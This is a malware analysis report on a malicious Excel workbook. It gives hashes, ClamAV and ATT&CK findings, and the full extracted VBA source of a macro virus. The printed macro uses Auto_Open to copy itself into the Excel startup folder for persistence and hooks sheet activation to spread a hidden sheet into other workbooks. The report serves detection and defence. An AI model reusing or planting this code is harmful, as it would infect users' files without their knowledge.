Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4e6e778740f35ad…

MALICIOUS

Office (OOXML)

236.3 KB Created: 2009-11-18 14:45:47 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-23
MD5: 0f1a31bc1756991cc6a8c7fe42ed38e0 SHA-1: d1f7b1603618e4b77094eb3d3bb3c65d14bc8835 SHA-256: a4e6e778740f35adf06e8771b945f016d9f66d33207f588c72a9ff7134727e19
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel document containing VBA macros, specifically an Auto_Open macro. This macro is designed to copy itself to the Excel startup directory ('XLSTART') as 'mypersonnel.xls'. This action establishes persistence, ensuring the malicious macro executes every time Microsoft Excel is launched. The document body appears to be a legitimate project deployment schedule, likely used as a lure.

Heuristics 4

  • ClamAV: Xls.Virus.Valyria-10004391-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Virus.Valyria-10004391-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1304 bytes
SHA-256: 3521c9120c3d6f6198577135f38f2fd19b399dd53636d28342651a276b50413f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"

Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
  End If
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 17408 bytes
SHA-256: f4464192d111fa7812a3038544056963ed8c051b6936bfb83944e7c0f003fa21
Detection
ClamAV: Xls.Virus.Valyria-10004391-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.